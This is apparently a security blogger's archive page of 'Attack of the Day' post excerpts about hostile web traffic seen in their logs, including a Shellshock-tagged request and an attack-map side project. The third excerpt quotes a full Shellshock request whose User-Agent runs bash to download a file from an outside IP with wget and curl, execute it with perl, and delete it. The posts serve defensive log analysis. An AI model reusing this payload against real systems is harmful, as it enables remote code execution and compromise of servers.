Thanks for the Heads Up

Posted 2 CommentsPosted in Attack of the Day

While cleaning out some junk logs and double checking things for a different project I’m currently working on, I stumbled across this in the long list of thrown away traffic: GET /Ringing.at.your.dorbell! HTTP/1.0 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Cookie: Greetz to M, st0n3d, Jorgee, CoLdZeRo, and Tomato lol! Referer: http://google.com/search?q=2+guys+1+horse User-Agent: CVE-2014-6271 😉 Test: Still a lot of these at 2015! haha! ‘tangina! X-Forwarded-For: 174.36.209.208 By itself, kind of funny for a number of reasons. I thought it was very kind of them to announce their presence AND give me 3 […]

Attack Maps

Posted Leave a commentPosted in Attack of the Day

This isn’t really an attack of the day.. it’s more of a “I needed to learn Javascript and this was my project” type thing. The map is fun for about 10 minutes; after that, not as much.  It is cool to see where things are coming from and what is being thrown away, though.  Want to see this glorious map? *updated: 8/3/15* Well, too bad. I broke it and am not really interested in fixing it. Sorry. How the Map Works Data Collection:  All of the data is collected in Splunk via syslog. […]

Statistics..

Posted Posted in Attack of the Day

Break out your text books, kids.  Today we’re going to talk about statistics..  Well, more like “counting with graphs” but whatever.. Couple of point on the data presented below.  First, it is very common to see a single request violate several rules.  Take this request, for instance. GET /cgi-bin/bts.cgi HTTP/1.0 Host: 69.44.4.28 User-Agent: () { :;}; /bin/bash -c “cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex” Connection: Keep-Alive X-Forwarded-For: 72.9.231.226 X_FORWARDED_PROTO: https There’s so much wrong with this, I’m not sure where to start. Signature violations, […]